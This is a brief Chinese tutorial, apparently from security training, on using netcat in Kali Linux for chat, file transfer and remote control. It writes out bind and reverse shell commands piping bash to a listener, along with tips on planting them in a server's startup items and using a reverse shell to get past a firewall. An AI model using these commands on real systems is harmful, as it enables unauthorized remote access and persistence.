kail linux 下nc工具的基本使用（安全牛視頻）

一、簡介
nc是netcat的簡寫，有着網絡界的瑞士×××美譽。因爲它短小精悍、功能實用，被設計爲一個簡單、可靠的網絡工具。
nc 常用的命令有兩個：
1、-v 輸出詳細的交互或者出錯信息
2、-n 如果後面是ip地址不會進行dns解析
eg：nc -vn 192.168.11.11 8888
二、利用nc文本傳輸:
類似於socket一個作爲服務端，一個作爲客戶端。
服務端命令：nc -l -p 端口
客戶端命令： nc -vn ip port
拓展：
在電子取證的時候會用到。用 | 管道符將客戶端輸出的結果發送到服務端。
傳輸文件：
接收方命令： nc -lp 333>1.txt 
發送方命令：nc -nv 111.11.11.11 333  <2 .txt
三、利用nc實現遠程控制
將自己的shell腳本放在自己的端口處等待連接或者接受對方傳送過來的shell窗口來實現遠程控制。
方法一； nc -lp 333 -c bash(nc -vn 192.168.22.22 333)（等待對方來連接）
方法二：nc -lp 333 (nc -vn -192.145.11.1 333 -c bash)（接受對方的shell窗口）
×××思路：
可以將該命令寫成腳本，然後放在服務器的開機啓動項裏面。
因爲網站防火牆的存在，進制在外面通過端口想裏面發送東西，故可以嘗試第二中方法。
tips：
在window用戶中應將bash 改爲cmd 
四、nc工具拓展
通過管道符號結合nc命令會產生意想不到的效果
比如利用nc命令結合壓縮命令可以發送整個壓縮包。
五、缺陷
1、明文傳輸，容易被嗅探（可以通過系統加密方法）
2、缺乏身份驗證機制，不安全，容易被其他人盜用。
3、不同版本的nc是不同的、參數也有可能不同。unbutn版本的nc沒有-c
六、拓展
1、爲了解決上面的問題，便出現了ncat工具，該工具是nmap工具集中的一個工具。
2、命令：服務器端：ncat  -c  bash --allow “you ip” - vnl 333 --ssl

            客戶端： ncat -vn  “ip” “端口 ”   --ssl

     每次連接的哈希值是會改變的,ncat可以實現的功能都可以通過nc實現。